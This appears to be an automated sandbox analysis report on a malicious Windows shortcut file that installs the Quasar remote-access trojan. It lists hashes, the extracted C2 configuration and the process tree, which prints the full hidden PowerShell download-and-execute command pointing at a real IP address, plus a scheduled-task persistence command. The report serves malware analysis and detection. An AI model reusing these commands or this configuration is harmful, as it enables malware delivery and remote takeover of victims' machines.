Analysis
max time kernel: 130s
max time network: 136s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 02-11-2024 02:50
Static task: static1
Behavioral task: behavioral1
Sample: 184d7427be227ca0505c4baf5a9d3756534f399b052309e19ba819d06d03a543.lnk
Resource: win7-20240903-en
General
Target: 184d7427be227ca0505c4baf5a9d3756534f399b052309e19ba819d06d03a543.lnk
Size: 2KB
MD5: 4a98c5bbf1a94992ec72858d3327a28e
SHA1: 0fa914c44bdcb63d3631d5ec30cebb5047d12c7a
SHA256: 184d7427be227ca0505c4baf5a9d3756534f399b052309e19ba819d06d03a543
SHA512: e60fb58d1f141d3c2ea99bf39d3b0dd872bebc05efa0cfa630e783f4d90b624084988c66621adc4d7dc6434b1c707d1d6c7c1f36ee2fa2e36fefc47b9a7d6ba7
Malware Config
Extracted (download URL):
  http://45.149.241.169:5336/ghsjfsgfjsyhsfhzgbdfbgzgfb/yugygfyjsbdfoesrjfzbhffbserhbwdewbrtsnbdjkfbrhjgvghvhgvhgvhgvHfgcNchgfcnhchgchgcnGfcngcgdcngchcngch/jhbhfbjadhghjvgfcxhhfcjtgvkhdfskjdkbzhdfhmzdkydbfvhzdfjgvhzvg/tfvjtcfgchgcgcHcgcftjcgtygvgFtrdcjfcgkhvGcjfcxhfcjgVK/chfgcx.exe
Extracted (quasar):
  family: quasar
  version: 1.3.0.0
  VTROY
  C2: 31.13.224.12:61512
  C2: 31.13.224.13:61513
  mutex: QSR_MUTEX_4Q2rJqiVyC7hohzbjx
  encryption_key: 7Vp2dMCHrMjJthQ2Elyy
  install_name: downloads.exe
  log_directory: Logs
  reconnect_delay: 5000
  startup_key: cssrse.exe
  subdirectory: downloadupdates
Signatures
- Quasar family
- Quasar payload (1 IoC)
  Processes:
  resource | yara_rule
  behavioral2/memory/2524-29-0x0000000000400000-0x000000000045E000-memory.dmp | family_quasar
- Blocklisted process makes network request (1 IoC)
  Processes: powershell.exe
  flow | pid | Process
  3 | 5108 | powershell.exe
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell and hides the display window.
- Downloads MZ/PE file
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely for geofencing.
  Processes: cmd.exe
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | cmd.exe
- Executes dropped EXE (8 IoCs)
  Processes: ujtjewc.exe, downloads.exe
  pid | Process
  4508 | ujtjewc.exe
  2524 | ujtjewc.exe
  4952 | ujtjewc.exe
  3516 | ujtjewc.exe
  5048 | downloads.exe
  2660 | downloads.exe
  3444 | downloads.exe
  3508 | downloads.exe
- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
  flow | ioc
  21 | ip-api.com
- Suspicious use of SetThreadContext (6 IoCs)
  Processes: ujtjewc.exe, downloads.exe
  description | pid | Process | procid_target
  PID 4508 set thread context of 2524 | 4508 | ujtjewc.exe | 91
  PID 4508 set thread context of 4952 | 4508 | ujtjewc.exe | 92
  PID 4508 set thread context of 3516 | 4508 | ujtjewc.exe | 93
  PID 5048 set thread context of 2660 | 5048 | downloads.exe | 103
  PID 5048 set thread context of 3444 | 5048 | downloads.exe | 104
  PID 5048 set thread context of 3508 | 5048 | downloads.exe | 105
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Program crash (4 IoCs)
  Processes: WerFault.exe
  pid | pid_target | Process
  32 | 4952 | WerFault.exe
  3660 | 2660 | WerFault.exe
  1284 | 3444 | WerFault.exe
  4392 | 3508 | WerFault.exe
- System Location Discovery: System Language Discovery (1 TTP, 5 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Processes: ujtjewc.exe, schtasks.exe, downloads.exe
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ujtjewc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ujtjewc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ujtjewc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | downloads.exe
- Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: powershell.exe
  pid | Process
  5108 | powershell.exe
  5108 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes: powershell.exe, ujtjewc.exe, downloads.exe
  description | pid | Process
  Token: SeDebugPrivilege | 5108 | powershell.exe
  Token: SeDebugPrivilege | 4508 | ujtjewc.exe
  Token: SeDebugPrivilege | 3516 | ujtjewc.exe
  Token: SeDebugPrivilege | 5048 | downloads.exe
- Suspicious use of UnmapMainImage (1 IoC)
  Processes: ujtjewc.exe
  pid | Process
  4952 | ujtjewc.exe
- Suspicious use of WriteProcessMemory (59 IoCs; identical rows collapsed, repeats given in the last column)
  Processes: cmd.exe, powershell.exe, ujtjewc.exe, downloads.exe
  description | pid | Process | procid_target | repeats
  PID 2596 wrote to memory of 5108 | 2596 | cmd.exe | 86 | 2
  PID 5108 wrote to memory of 4508 | 5108 | powershell.exe | 90 | 3
  PID 4508 wrote to memory of 2524 | 4508 | ujtjewc.exe | 91 | 8
  PID 4508 wrote to memory of 4952 | 4508 | ujtjewc.exe | 92 | 8
  PID 4508 wrote to memory of 3516 | 4508 | ujtjewc.exe | 93 | 8
  PID 3516 wrote to memory of 2696 | 3516 | ujtjewc.exe | 99 | 3
  PID 3516 wrote to memory of 5048 | 3516 | ujtjewc.exe | 101 | 3
  PID 5048 wrote to memory of 2660 | 5048 | downloads.exe | 103 | 8
  PID 5048 wrote to memory of 3444 | 5048 | downloads.exe | 104 | 8
  PID 5048 wrote to memory of 3508 | 5048 | downloads.exe | 105 | 8
Processes (tree; indentation shows parent/child depth)
C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\184d7427be227ca0505c4baf5a9d3756534f399b052309e19ba819d06d03a543.lnk
  PID: 2596
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hIdDEn Hiddden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('http://45.149.241.169:5336/ghsjfsgfjsyhsfhzgbdfbgzgfb/yugygfyjsbdfoesrjfzbhffbserhbwdewbrtsnbdjkfbrhjgvghvhgvhgvhgvHfgcNchgfcnhchgchgcnGfcngcgdcngchcngch/jhbhfbjadhghjvgfcxhhfcjtgvkhdfskjdkbzhdfhmzdkydbfvhzdfjgvhzvg/tfvjtcfgchgcgcHcgcftjcgtygvgFtrdcjfcgkhvGcjfcxhfcjgVK/chfgcx.exe','ujtjewc.exe');./'ujtjewc.exe';(get-item 'ujtjewc.exe').Attributes += 'Hidden';
    PID: 5108
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe
      "C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe"
      PID: 4508
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe
        C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe
        PID: 2524
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
      C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe
        C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe
        PID: 4952
        - Executes dropped EXE
        - Suspicious use of UnmapMainImage
        C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 12
          PID: 32
          - Program crash
      C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe
        C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe
        PID: 3516
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\schtasks.exe
          "schtasks" /create /tn "cssrse.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe" /rl HIGHEST /f
          PID: 2696
          - System Location Discovery: System Language Discovery
          - Scheduled Task/Job: Scheduled Task
        C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe
          "C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe"
          PID: 5048
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - System Location Discovery: System Language Discovery
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe
            C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe
            PID: 2660
            - Executes dropped EXE
            C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 80
              PID: 3660
              - Program crash
          C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe
            C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe
            PID: 3444
            - Executes dropped EXE
            C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 80
              PID: 1284
              - Program crash
          C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe
            C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe
            PID: 3508
            - Executes dropped EXE
            C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3508 -s 80
              PID: 4392
              - Program crash
C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4952 -ip 4952
  PID: 748
C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2660 -ip 2660
  PID: 4660
C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3444 -ip 3444
  PID: 4884
C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3508 -ip 3508
  PID: 4424
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 522B
  MD5: 0f39d6b9afc039d81ff31f65cbf76826
  SHA1: 8356d04fe7bba2695d59b6caf5c59f58f3e1a6d8
  SHA256: ea16b63ffd431ebf658b903710b6b3a9b8a2eb6814eee3a53b707a342780315d
  SHA512: 5bad54adb2e32717ef6275f49e2f101dd7e2011c9be14a32e5c29051e8a3f608cbd0b44ac4855ab21e790cb7a5d84c5f69de087074fd01b35259d34d07f5aaf9
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 774KB
  MD5: b8fc2efcc33d3160f38fcb6b39319e6a
  SHA1: a61413a5b6c19b4a388e6c89aaa9304c657b3e08
  SHA256: 3df20b1c9806c327d72824f1b9a4ffcbe702d152fbf11fca42a36c862cbafd0a
  SHA512: ba4ef7ec5dd7b9ad8ec49ef73315bded8ecc72212b11e3a1384b6d4f3f264867312cda41268a8d1df6fc8c3caa63813c15aa4ff29f0324360a95d59de3456d3b